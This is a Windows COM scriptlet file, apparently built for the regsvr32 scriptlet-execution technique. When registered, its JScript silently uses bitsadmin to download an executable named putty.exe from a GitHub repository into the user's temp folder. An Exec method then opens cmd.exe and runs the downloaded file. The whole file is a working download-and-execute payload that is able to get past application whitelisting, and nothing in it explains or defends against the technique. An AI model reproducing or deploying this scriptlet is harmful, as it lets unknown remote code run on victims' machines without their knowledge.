<?XML version="1.0"?>
<scriptlet>

<registration
    description="Test"
    progid="Test"
    version="1.00"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}"
	>
	
	<script language="JScript">
		<![CDATA[
	
			new ActiveXObject("WScript.Shell").Run("bitsadmin /transfer mydownloadjob /download /priority normal https://github.com/c0mp4s5/java/raw/master/putty.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\putty.exe",0,true);
	
		]]>
</script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
	
	function Exec()
	{
		var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
		var t = new ActiveXObject("WScript.Shell").Run("C:\\Users\\%USERNAME%\\AppData\\local\\temp\\putty.exe");
		
	}
	
]]>
</script>

</scriptlet>
